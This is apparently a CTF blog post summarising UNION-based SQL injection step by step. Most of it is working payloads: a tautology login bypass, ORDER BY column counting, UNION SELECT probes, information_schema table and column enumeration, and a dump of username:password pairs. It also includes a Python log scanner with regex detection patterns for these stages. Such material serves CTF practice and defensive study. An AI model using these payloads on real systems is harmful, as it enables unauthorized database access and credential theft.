[CTF] SQL injection summary

One, SQL injection approach

Field count -> echo position -> database -> table -> column -> flag

1. Log in with a universal password
2. After logging in, inject with a UNION query
3. Find the number of fields
4. Find the echo position
5. Dump the database
6. Dump the database tables
7. Dump the table columns
8. Dump the flag

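In an input box, # can be typed as is. When the payload is placed directly in the HackBar address bar, # must be URL-encoded, that is, replaced with %23, because a raw # starts the URL fragment, which the browser does not send to the server.

Use order by to find the number of fields: if the error first appears at 4, there are 4-1, that is, 3 fields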

1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #

Use a UNION query to find the echo position: the number that is displayed on the page marks where the data is shown, so replace that number with the command

1' union select 1,2,3 #

3

Dump the database

1' union select 1,2,version() #

VERSION

1' union select 1,2,database() #

DATABASE,DATABASE1

Dump the tables

With only one database, it is simplest to set table_schema equal to database() directly

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

With multiple databases, select one

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE' #

AAA,BBB,CCC

Dump the columns

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' # 

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' # 

id,username,password

Read the content, dump the flag

1' union select 1,2,group_concat(id,username,password) from AAA #

id,username,password

1' union select 1,2,group_concat(username,0x3a,password) from AAA#

username:password,username:password

Short version

Find the number of fields

1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

Find the echo position

1' union select 1,2,3 #

Dump the database

1' union select 1,database(),version() #

DATABASE,VERSION

Dump the database tables

With only one database, it is simplest to set table_schema equal to database() directly

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

With multiple databases, select one

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE' #

AAA,BBB,CCC

Dump the columns of the table

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

Read the content, dump the flag

Read the AAA table

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

An ASCII code can be inserted as a separator so that the values are easy to tell apart

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1
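Seen from the server side, every stage of this walkthrough leaves a recognizable request in the access log. The following added example (not code from the original post) URL-decodes each query parameter and tags the stage it matches; the log lines, the /check.php path and the username parameter are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One signature per stage of the walkthrough on this page.
STAGES = [
    ("tautology login", re.compile(r"'\s*or\s+1\s*=\s*1", re.I)),
    ("column-count probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration",
     re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(request_target):
    """Return the stages matched by any URL-decoded query parameter."""
    hits = []
    query = urlsplit(request_target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for stage, pattern in STAGES:
            if pattern.search(value) and stage not in hits:
                hits.append(stage)
    return hits

def scan(log_lines):
    """Map each client address to the ordered list of stages it triggered."""
    seen = {}
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        for stage in classify(target):
            stages = seen.setdefault(client, [])
            if stage not in stages:
                stages.append(stage)
    return seen

# Constructed access-log lines (documentation addresses, hypothetical path).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /check.php?username=alice&password=s3cret HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /check.php?username=admin%27+or+1%3D1+%23&password=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /check.php?username=1%27+order+by+4+%23&password=1 HTTP/1.1" 500 120',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /check.php?username=1%27+union+select+1,2,3+%23&password=1 HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:00:20 +0000] "GET /check.php?username=1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+%23&password=1 HTTP/1.1" 200 530',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

A client that moves through several stages in sequence, as 203.0.113.9 does in the sample, is a much stronger signal than a single match; pattern matching of this kind supports detection and does not replace parameterized queries in the application.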

Two, SQL injection types

Three, techniques

Universal password

admin' or 1=1 #

Common URL encoding

# %23

Commonly used ASCII codes

0x3a :
0x40 @

https://www.litefeel.com/tools/ascii.php

Four, tools

1. HackBar

Shortcut: Ctrl + Enter to execute

2. sqlmap

3. Script

Five, bypass

Not completed yet, to be supplemented...

Origin blog.csdn.net/vanarrow/article/details/107993494